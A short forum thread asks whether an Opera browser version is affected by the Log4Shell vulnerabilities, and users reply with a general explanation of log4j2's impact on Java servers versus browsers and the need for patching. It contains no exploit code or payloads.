Is Opera 82.0.4227.33 protected by Log4Shell attacks?
-
nephtys59 last edited by leocg
Is Opera 82.0.4227.33 protected by Log4Shell attacks?
See:
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://nvd.nist.gov/vuln/detail/CVE-2021-45046Thanks!
-
-
-
blackbird71 last edited by blackbird71@nephtys59 Log4j2 is a logging package for Java that responds to "calls" made to its library (but which, in the case of the vulnerability, can be made to introduce all manner of unauthorized commands into the host system). Hence, the primary log4j2 vulnerability (CVE-2021-44228, CVE-2021-45046) rests with systems running Java applications or that interface in certain ways with systems running such Java applications. As a result, the ultimate solution to this primarily rests with operators of such systems updating their log4j2 libraries to log4j2.16 or later (an initial log4j2.15 "fix" was found to still have some weaknesses). Given that in the real world, Java applications can exist in myriad places and be deeply embedded into all manner of systems and servers, it's likely that the vulnerability may unfortunately remain with us for a long time to come.
The question you raised is to what extent a web browser can be impacted by the log4j2 issue. If the browser itself doesn't contain Java calls (not to be confused with the unrelated JavaScript language) or coding modules, then the browser isn't directly affected by the vulnerability. If the browser does contain Java linkages, then it can in theory be affected by the vulnerability even if a vulnerable log4j2 package resides on a server with which the browser is communicating. Whether Opera (or any other browser) contains any Java linkages is for its developers to state.
That said, even without Java linkages existing in a browser, any server (including web site servers or whatever they themselves may link to) that contains a vulnerable log4j2 package version is susceptible to being hacked in almost any conceivable manner. That, in turn, means the potential for website hacking (even for otherwise "safe" or reputable sites) goes up greatly in the Internet world... and that presents increased risks for all web browsing regardless of the browser. Keeping a browser up to its latest version is a primary defense against a hacked website causing grief to the user's system by exploitation of a browser flaw. But there is little defense against a hacked website itself abusing a user's data if it involves the user logging in and/or supplying personal/financial information to the 'trusted' site. That's where a lot of the current concern about this issue really rests.
-
blackbird71 last edited by blackbird71
And now... yet another vulnerability has shown up in the Log4Shell saga: CVE-2021-45105. Apparently, the Log4j2.16 patch has its own issues with that, and so it's been replaced by yet another patch version: Log4j2.17. (https://www.theregister.com/2021/12/19/log4j_new_flaw_cve_2021_45105/ )
It looks increasingly like this is becoming a Pandora's box of problems...
-
sgunhouse Moderator Volunteer last edited by
@blackbird71 Java always was, which is why browsers stopped supporting it.
-
Locked by
leocg
